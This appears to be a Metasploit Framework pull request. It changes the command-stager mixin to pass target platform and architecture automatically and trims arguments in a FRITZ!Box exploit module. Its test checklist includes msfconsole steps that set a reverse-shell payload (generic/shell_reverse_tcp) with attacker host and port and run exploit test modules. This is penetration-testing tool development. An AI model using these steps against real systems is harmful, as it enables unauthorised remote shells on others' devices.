### PR TITLE
Automatically pass arch & platform from cmdstager

### DIFF
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -112,7 +112,10 @@ module Exploit::CmdStager
   def generate_cmdstager(opts = {}, pl = nil)
     select_cmdstager(opts)
 
-    exe_opts = {code: pl}.merge(opts)
+    exe_opts = {code: pl}.merge(
+        platform: target_platform,
+        arch: target_arch
+      )
     self.exe = generate_payload_exe(exe_opts)
 
     if exe.nil?

--- a/modules/exploits/linux/http/fritzbox_echo_exec.rb
+++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb
@@ -110,9 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Exploiting...")
     execute_cmdstager(
       flavor: :echo,
-      linemax: 92,
-      platform: target.platform,
-      arch: target.arch
+      linemax: 92
     )
   end
 end


### PR DESCRIPTION
This allows the cmdstager mixin to automatically pass the arch and platform information without changing the modules. This should address the following tickets:

Fix #5727
Fix #5718
Fix #5761

There are 55 modules that use Msf::Exploit::CmdStager, so this affects all of them. For testing purposes, please at least try:

**fritzbox_echo_exec**

This was reported by an user, so it would be nice to make sure this still works.
- [x] Please follow the same verification steps in #5763

**Target-specific setup**

Some modules may have target-specific arch/platform.
- [x] Make sure you have the fake server running: `ruby -run -e httpd . -p 8181`
- [x] Save this test module: https://gist.github.com/wchen-r7/872276d5fe0044f35406
- [x] Start msfconsole
- [x] Load the test module
- [x]  `set rhost [IP]`
- [x]  `set rport [port]`
- [x]  `set payload generic/shell_reverse_tcp`
- [x]  `set lhost [IP]`
- [x]  `set lport [port]`
- [x]  `run`
- [ ] You should see the command stager sending data to the web server

**Non target specific setup**

Some modules don't define their arch/platform in specific targets. For example, the most common is they put the arch/platform info in the metadata, and then leave the only target as "Universal".
- [x] Save this test module: https://gist.github.com/wchen-r7/1c3e745444f1913c7ea3
- [x] Start msfconsole
- [x] Load the test module
- [x]  `set rhost [IP]`
- [x]  `set rport [port]`
- [x]  `set payload generic/shell_reverse_tcp`
- [x]  `set lhost [IP]`
- [x]  `set lport [port]`
- [x]  `run`
- [ ] You should see the command stager sending data to the web server

**Others**

Please feel free to test other exploit modules.
